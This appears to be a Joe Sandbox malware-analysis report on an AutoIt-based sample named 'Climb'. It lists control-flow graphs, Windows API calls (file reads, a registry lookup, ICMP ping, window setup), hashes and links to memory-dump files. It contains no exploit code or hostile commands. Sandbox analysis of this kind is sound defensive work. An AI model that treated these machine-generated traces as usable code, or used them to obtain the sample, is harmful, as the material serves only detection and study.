                                                                                                                                                                          control_flow_graph 388 aa09db-aa0a0b call aa07af 391 aa0a0d-aa0a18 call a8f636 388->391 392 aa0a26-aa0a32 call a95594 388->392 397 aa0a1a-aa0a21 call a8f649 391->397 398 aa0a4b-aa0a94 call aa071a 392->398 399 aa0a34-aa0a49 call a8f636 call a8f649 392->399 408 aa0cfd-aa0d03 397->408 406 aa0b01-aa0b0a GetFileType 398->406 407 aa0a96-aa0a9f 398->407 399->397 412 aa0b0c-aa0b3d GetLastError call a8f613 CloseHandle 406->412 413 aa0b53-aa0b56 406->413 410 aa0aa1-aa0aa5 407->410 411 aa0ad6-aa0afc GetLastError call a8f613 407->411 410->411 417 aa0aa7-aa0ad4 call aa071a 410->417 411->397 412->397 427 aa0b43-aa0b4e call a8f649 412->427 415 aa0b58-aa0b5d 413->415 416 aa0b5f-aa0b65 413->416 420 aa0b69-aa0bb7 call a954dd 415->420 416->420 421 aa0b67 416->421 417->406 417->411 431 aa0bb9-aa0bc5 call aa092b 420->431 432 aa0bc7-aa0beb call aa04cd 420->432 421->420 427->397 431->432 437 aa0bef-aa0bf9 call a98a2e 431->437 438 aa0bfe-aa0c41 432->438 439 aa0bed 432->439 437->408 441 aa0c62-aa0c70 438->441 442 aa0c43-aa0c47 438->442 439->437 445 aa0cfb 441->445 446 aa0c76-aa0c7a 441->446 442->441 444 aa0c49-aa0c5d 442->444 444->441 445->408 446->445 447 aa0c7c-aa0caf CloseHandle call aa071a 446->447 450 aa0ce3-aa0cf7 447->450 451 aa0cb1-aa0cdd GetLastError call a8f613 call a956a6 447->451 450->445 451->450
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AA071A: CreateFileW.KERNEL32(00000000,00000000,?,00AA0A84,?,?,00000000,?,00AA0A84,00000000,0000000C), ref: 00AA0737
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00AA0AEF
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00AA0AF6
                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00AA0B02
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00AA0B0C
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00AA0B15
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AA0B35
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00AA0C7F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00AA0CB1
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00AA0CB8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                          • Opcode ID: bb707916354f9b2bb492de1dd9d246453ed9648e3f4adb7110cc3c147e928120
                                                                                                                                                                          • Instruction ID: 1718203cde5db6ded8cc100dcf4f9449cae92ec911a3eaf4a17bc2952aa8935e
                                                                                                                                                                          • Opcode Fuzzy Hash: bb707916354f9b2bb492de1dd9d246453ed9648e3f4adb7110cc3c147e928120
                                                                                                                                                                          • Instruction Fuzzy Hash: 02A11632A042498FDF19EFB8D952BAD7BA1AB06324F140259F811DF2E1DB319D12CB61

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A65594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00A655B2
                                                                                                                                                                            • Part of subcall function 00A65238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A6525A
                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A653C4
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AA4BFD
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AA4C3E
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00AA4C80
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AA4CE7
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AA4CF6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                          • API String ID: 98802146-2727554177
                                                                                                                                                                          • Opcode ID: c971c0632c16e4db35d0012818c164ebbd2fbbcc211c613c5d25c666463cf69e
                                                                                                                                                                          • Instruction ID: a01bbd72e7a2fb12f7a44e58aa16a86ac134da2e99eb451731e4ef5d1d39eada
                                                                                                                                                                          • Opcode Fuzzy Hash: c971c0632c16e4db35d0012818c164ebbd2fbbcc211c613c5d25c666463cf69e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C718B71504301AEC301EF69E9819AFBBF8FF98B50F90442EF545872A0EF719A49CB95

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00A634DE
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00A634ED
                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00A63503
                                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 00A63515
                                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 00A63527
                                                                                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A6353F
                                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 00A63590
                                                                                                                                                                            • Part of subcall function 00A63624: GetSysColorBrush.USER32(0000000F), ref: 00A63657
                                                                                                                                                                            • Part of subcall function 00A63624: RegisterClassExW.USER32(00000030), ref: 00A63681
                                                                                                                                                                            • Part of subcall function 00A63624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A63692
                                                                                                                                                                            • Part of subcall function 00A63624: InitCommonControlsEx.COMCTL32(?), ref: 00A636AF
                                                                                                                                                                            • Part of subcall function 00A63624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A636BF
                                                                                                                                                                            • Part of subcall function 00A63624: LoadIconW.USER32(000000A9), ref: 00A636D5
                                                                                                                                                                            • Part of subcall function 00A63624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A636E4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                                                                          • Opcode ID: 4b15e65b1f888389daf45eb3081fe359e9916c639575dd3988095fcfaad3ec17
                                                                                                                                                                          • Instruction ID: a84a9164517ce3444f72efc207c47a254e6764caf8351d8a8453cdd97a12c5c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b15e65b1f888389daf45eb3081fe359e9916c639575dd3988095fcfaad3ec17
                                                                                                                                                                          • Instruction Fuzzy Hash: B1211A75D00318AFDB11DFA9EC55AAEBFB5FB08B50F20401AE604A72A0DBB94545CF98

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 529 ae0fb8-ae0fef call a6e6a0 532 ae100f-ae1021 WSAStartup 529->532 533 ae0ff1-ae0ffe call a6c98d 529->533 535 ae1054-ae1091 call a7c1f6 call a68ec0 call a7f9d4 inet_addr gethostbyname 532->535 536 ae1023-ae1031 532->536 533->532 542 ae1000-ae100b call a6c98d 533->542 552 ae10a2-ae10b0 535->552 553 ae1093-ae10a0 IcmpCreateFile 535->553 539 ae1036-ae1046 536->539 540 ae1033 536->540 543 ae104b-ae104f 539->543 544 ae1048 539->544 540->539 542->532 547 ae1249-ae1251 543->547 544->543 555 ae10b5-ae10c5 552->555 556 ae10b2 552->556 553->552 554 ae10d3-ae1100 call a8017b call a6423c 553->554 565 ae112b-ae1148 IcmpSendEcho 554->565 566 ae1102-ae1129 IcmpSendEcho 554->566 557 ae10ca-ae10ce 555->557 558 ae10c7 555->558 556->555 560 ae1240-ae1244 call a6bd98 557->560 558->557 560->547 567 ae114c-ae114e 565->567 566->567 568 ae11ae-ae11bc 567->568 569 ae1150-ae1155 567->569 570 ae11be 568->570 571 ae11c1-ae11c8 568->571 572 ae115b-ae1160 569->572 573 ae11f8-ae120a call a6e6a0 569->573 570->571 574 ae11e4-ae11ed 571->574 575 ae11ca-ae11d8 572->575 576 ae1162-ae1167 572->576 587 ae120c-ae120e 573->587 588 ae1210 573->588 580 ae11ef 574->580 581 ae11f2-ae11f6 574->581 578 ae11dd 575->578 579 ae11da 575->579 576->568 582 ae1169-ae116e 576->582 578->574 579->578 580->581 584 ae1212-ae1229 IcmpCloseHandle WSACleanup 581->584 585 ae1193-ae11a1 582->585 586 ae1170-ae1175 582->586 584->560 592 ae122b-ae123d call a8013d call a80184 584->592 590 ae11a6-ae11ac 585->590 591 ae11a3 585->591 586->575 589 ae1177-ae1185 586->589 587->584 588->584 593 ae118a-ae1191 589->593 594 ae1187 589->594 590->574 591->590 592->560 593->574 594->593
                                                                                                                                                                          APIs
                                                                                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 00AE1019
                                                                                                                                                                          • inet_addr.WSOCK32(?), ref: 00AE1079
                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 00AE1085
                                                                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00AE1093
                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE1123
                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE1142
                                                                                                                                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00AE1216
                                                                                                                                                                          • WSACleanup.WSOCK32 ref: 00AE121C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                          • String ID: Ping
                                                                                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                                                                                          • Opcode ID: ec88082886a1abaef224ac14f245d4b75bd9f937cfda28d4c5a1495cb618dda4
                                                                                                                                                                          • Instruction ID: 11c7d0678c18914a107dcc5ba54b68c726c5516a13ea845f06663e61191ebcb8
                                                                                                                                                                          • Opcode Fuzzy Hash: ec88082886a1abaef224ac14f245d4b75bd9f937cfda28d4c5a1495cb618dda4
                                                                                                                                                                          • Instruction Fuzzy Hash: 679180316042919FD720DF56C988F16BBF1AF44318F1486ADF5698B6A2C731ED46CB81

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 599 a6370f-a63724 600 a63726-a63729 599->600 601 a63784-a63786 599->601 603 a6378a 600->603 604 a6372b-a63732 600->604 601->600 602 a63788 601->602 605 a6376f-a63777 DefWindowProcW 602->605 606 a63790-a63795 603->606 607 aa3df4-aa3e1c call a62f92 call a7f23c 603->607 608 a63804-a6380c PostQuitMessage 604->608 609 a63738-a6373d 604->609 613 a6377d-a63783 605->613 615 a63797-a6379a 606->615 616 a637bc-a637e3 SetTimer RegisterWindowMessageW 606->616 642 aa3e21-aa3e28 607->642 614 a637b8-a637ba 608->614 610 a63743-a63747 609->610 611 aa3e61-aa3e75 call acc8f7 609->611 617 a6380e-a63818 call a7fcad 610->617 618 a6374d-a63752 610->618 611->614 634 aa3e7b 611->634 614->613 622 a637a0-a637b3 KillTimer call a63907 call a659ff 615->622 623 aa3d95-aa3d98 615->623 616->614 619 a637e5-a637f0 CreatePopupMenu 616->619 636 a6381d 617->636 624 aa3e46-aa3e4d 618->624 625 a63758-a6375d 618->625 619->614 622->614 629 aa3d9a-aa3d9e 623->629 630 aa3dd0-aa3def MoveWindow 623->630 624->605 640 aa3e53-aa3e5c call ac1423 624->640 632 a637f2-a63802 call a6381f 625->632 633 a63763-a63769 625->633 637 aa3dbf-aa3dcb SetFocus 629->637 638 aa3da0-aa3da3 629->638 630->614 632->614 633->605 633->642 634->605 636->614 637->614 638->633 643 aa3da9-aa3dba call a62f92 638->643 640->605 642->605 648 aa3e2e-aa3e41 call a63907 call a6396b 642->648 643->614 648->605
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A63709,?,?), ref: 00A63777
                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00A63709,?,?), ref: 00A637A3
                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A637C6
                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A63709,?,?), ref: 00A637D1
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00A637E5
                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00A63806
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                          • String ID: TaskbarCreated
                                                                                                                                                                          • API String ID: 129472671-2362178303
                                                                                                                                                                          • Opcode ID: bd01f94bcb3ab6679e4fc76c618bf7a0acb78a3cbd0cf1384a26efae33820899
                                                                                                                                                                          • Instruction ID: fbec2c483e447e8526994c261b7fe2d3f3cd6999dcbcc6977750260fa3cc9a50
                                                                                                                                                                          • Opcode Fuzzy Hash: bd01f94bcb3ab6679e4fc76c618bf7a0acb78a3cbd0cf1384a26efae33820899
                                                                                                                                                                          • Instruction Fuzzy Hash: D841F4F3600245BBDF15ABB89D4DBBD3AB9EB01300F104229F5028B2A1DB759B06D761

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 655 a990c5-a990d5 656 a990ef-a990f1 655->656 657 a990d7-a990ea call a8f636 call a8f649 655->657 659 a99459-a99466 call a8f636 call a8f649 656->659 660 a990f7-a990fd 656->660 673 a99471 657->673 678 a9946c call a92b5c 659->678 660->659 663 a99103-a9912e 660->663 663->659 666 a99134-a9913d 663->666 669 a9913f-a99152 call a8f636 call a8f649 666->669 670 a99157-a99159 666->670 669->678 671 a9915f-a99163 670->671 672 a99455-a99457 670->672 671->672 676 a99169-a9916d 671->676 677 a99474-a99479 672->677 673->677 676->669 680 a9916f-a99186 676->680 678->673 684 a99188-a9918b 680->684 685 a991a3-a991ac 680->685 686 a9918d-a99193 684->686 687 a99195-a9919e 684->687 688 a991ca-a991d4 685->688 689 a991ae-a991c5 call a8f636 call a8f649 call a92b5c 685->689 686->687 686->689 692 a9923f-a99259 687->692 690 a991db-a991dc call a93b93 688->690 691 a991d6-a991d8 688->691 717 a9938c 689->717 699 a991e1-a991f9 call a92d38 * 2 690->699 691->690 694 a9932d-a99336 call a9fc1b 692->694 695 a9925f-a9926f 692->695 708 a993a9 694->708 709 a99338-a9934a 694->709 695->694 698 a99275-a99277 695->698 698->694 702 a9927d-a992a3 698->702 725 a991fb-a99211 call a8f649 call a8f636 699->725 726 a99216-a9923c call a997a4 699->726 702->694 706 a992a9-a992bc 702->706 706->694 711 a992be-a992c0 706->711 713 a993ad-a993c5 ReadFile 708->713 709->708 714 a9934c-a9935b GetConsoleMode 709->714 711->694 718 a992c2-a992ed 711->718 720 a99421-a9942c GetLastError 713->720 721 a993c7-a993cd 713->721 714->708 716 a9935d-a99361 714->716 716->713 722 a99363-a9937d ReadConsoleW 716->722 723 a9938f-a99399 call a92d38 717->723 718->694 724 a992ef-a99302 718->724 727 a9942e-a99440 call a8f649 call a8f636 720->727 728 a99445-a99448 720->728 721->720 729 a993cf 721->729 730 a9937f GetLastError 722->730 731 a9939e-a993a7 722->731 723->677 724->694 735 a99304-a99306 724->735 725->717 726->692 727->717 732 a9944e-a99450 728->732 733 a99385-a9938b call a8f613 728->733 739 a993d2-a993e4 729->739 730->733 731->739 732->723 733->717 735->694 744 a99308-a99328 735->744 739->723 741 a993e6-a993ea 739->741 748 a993ec-a993fc call a98de1 741->748 749 a99403-a9940e 741->749 744->694 760 a993ff-a99401 748->760 754 a9941a-a9941f call a98c21 749->754 755 a99410 call a98f31 749->755 761 a99415-a99418 754->761 755->761 760->723 761->760
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6695438312bfdeadf4b9f83ce088ae4841cf6781c3ce7c61de80d3448b0d9162
                                                                                                                                                                          • Instruction ID: e5e352a12b26ff4c75c9dffd227278beb16216f07265245f63bc455a23a6c0e3
                                                                                                                                                                          • Opcode Fuzzy Hash: 6695438312bfdeadf4b9f83ce088ae4841cf6781c3ce7c61de80d3448b0d9162
                                                                                                                                                                          • Instruction Fuzzy Hash: 37C1DF74B04249AFDF12EFACD841BAEBBF4BF49310F14419DE954AB292D7309942CB61

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 763 a7ac3e-a7b063 call a68ec0 call a7bc58 call a6e6a0 770 a7b069-a7b073 763->770 771 ab8584-ab8591 763->771 774 ab896b-ab8979 770->774 775 a7b079-a7b07e 770->775 772 ab8593 771->772 773 ab8596-ab85a5 771->773 772->773 776 ab85aa 773->776 777 ab85a7 773->777 778 ab897b 774->778 779 ab897e 774->779 780 a7b084-a7b090 call a7b5b6 775->780 781 ab85b2-ab85b4 775->781 776->781 777->776 778->779 782 ab8985-ab898e 779->782 786 ab85bd 780->786 788 a7b096-a7b0a3 call a6c98d 780->788 781->786 784 ab8993 782->784 785 ab8990 782->785 791 ab899c-ab89eb call a6e6a0 call a7bbbe * 2 784->791 785->784 790 ab85c7 786->790 794 a7b0ab-a7b0b4 788->794 795 ab85cf-ab85d2 790->795 824 a7b1e0-a7b1f5 791->824 825 ab89f1-ab8a03 call a7b5b6 791->825 797 a7b0b8-a7b0d6 call a84d98 794->797 798 ab85d8-ab8600 call a84cd3 call a67ad5 795->798 799 a7b158-a7b16f 795->799 819 a7b0e5 797->819 820 a7b0d8-a7b0e1 797->820 835 ab862d-ab8651 call a67b1a call a6bd98 798->835 836 ab8602-ab8606 798->836 802 a7b175 799->802 803 ab8954-ab8957 799->803 808 ab88ff-ab8920 call a6e6a0 802->808 809 a7b17b-a7b17e 802->809 810 ab895d-ab8960 803->810 811 ab8a41-ab8a79 call a6e6a0 call a7bbbe 803->811 808->824 840 ab8926-ab8938 call a7b5b6 808->840 816 ab8729-ab8743 call a7bbbe 809->816 817 a7b184-a7b187 809->817 810->791 818 ab8962-ab8965 810->818 811->824 860 ab8a7f-ab8a91 call a7b5b6 811->860 845 ab8749-ab874c 816->845 846 ab888f-ab88b5 call a6e6a0 816->846 826 ab86ca-ab86e0 call a66c03 817->826 827 a7b18d-a7b190 817->827 818->774 818->824 819->790 830 a7b0eb-a7b0fc 819->830 820->797 828 a7b0e3 820->828 842 ab8ac9-ab8acf 824->842 843 a7b1fb-a7b20b call a6e6a0 824->843 865 ab8a2f-ab8a3c call a6c98d 825->865 866 ab8a05-ab8a0d 825->866 826->824 863 ab86e6-ab86fc call a7b5b6 826->863 838 a7b196-a7b1b8 call a6e6a0 827->838 839 ab8656-ab8659 827->839 828->830 830->774 841 a7b102-a7b11c 830->841 835->839 836->835 849 ab8608-ab862b call a6ad40 836->849 838->824 882 a7b1ba-a7b1cc call a7b5b6 838->882 839->774 855 ab865f-ab8674 call a66c03 839->855 885 ab893a-ab8943 call a6c98d 840->885 886 ab8945 840->886 841->795 854 a7b122-a7b154 call a7bbbe call a6e6a0 841->854 842->794 847 ab8ad5 842->847 858 ab87bf-ab87de call a6e6a0 845->858 859 ab874e-ab8751 845->859 846->824 891 ab88bb-ab88cd call a7b5b6 846->891 847->774 849->835 849->836 854->799 855->824 887 ab867a-ab8690 call a7b5b6 855->887 858->824 909 ab87e4-ab87f6 call a7b5b6 858->909 872 ab8ada-ab8ae8 859->872 873 ab8757-ab8774 call a6e6a0 859->873 905 ab8a93-ab8a9b 860->905 906 ab8ab5-ab8abe call a6c98d 860->906 910 ab86fe-ab870b call a68ec0 863->910 911 ab870d-ab8716 call a68ec0 863->911 917 ab8ac2-ab8ac4 865->917 880 ab8a0f-ab8a13 866->880 881 ab8a1e-ab8a29 call a6b4b1 866->881 894 ab8aea 872->894 895 ab8aed-ab8afd 872->895 873->824 920 ab877a-ab878c call a7b5b6 873->920 880->881 897 ab8a15-ab8a19 880->897 881->865 928 ab8b0b-ab8b19 881->928 929 ab86ba-ab86c3 call a6c98d 882->929 930 a7b1d2-a7b1de 882->930 888 ab8949-ab894f 885->888 886->888 931 ab869d-ab86ab call a68ec0 887->931 932 ab8692-ab869b call a6c98d 887->932 888->824 935 ab88cf-ab88dc call a6c98d 891->935 936 ab88de 891->936 894->895 912 ab8aff 895->912 913 ab8b02-ab8b06 895->913 914 ab8aa1-ab8aa3 897->914 921 ab8aa8-ab8ab3 call a6b4b1 905->921 922 ab8a9d 905->922 906->917 909->824 951 ab87fc-ab8805 call a7b5b6 909->951 952 ab8719-ab8724 call a68577 910->952 911->952 912->913 913->843 914->824 917->824 955 ab879f 920->955 956 ab878e-ab879d call a6c98d 920->956 921->906 921->928 922->914 941 ab8b1b 928->941 942 ab8b1e-ab8b21 928->942 929->826 930->824 962 ab86ae-ab86b5 931->962 932->962 950 ab88e2-ab88e9 935->950 936->950 941->942 942->782 958 ab88eb-ab88f0 call a6396b 950->958 959 ab88f5 call a63907 950->959 973 ab8818 951->973 974 ab8807-ab8816 call a6c98d 951->974 952->824 964 ab87a3-ab87ae call a89334 955->964 956->964 958->824 972 ab88fa 959->972 962->824 964->774 978 ab87b4-ab87ba 964->978 972->824 977 ab881c-ab883f 973->977 974->977 980 ab884d-ab8850 977->980 981 ab8841-ab8848 977->981 978->824 982 ab8852-ab885b 980->982 983 ab8860-ab8863 980->983 981->980 982->983 984 ab8873-ab8876 983->984 985 ab8865-ab886e 983->985 984->824 986 ab887c-ab888a 984->986 985->984 986->824
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                          • API String ID: 0-4285391669
                                                                                                                                                                          • Opcode ID: d50e894d0ed5f1cacf5506d34cb221a473221971bdd18aa164492682193a0137
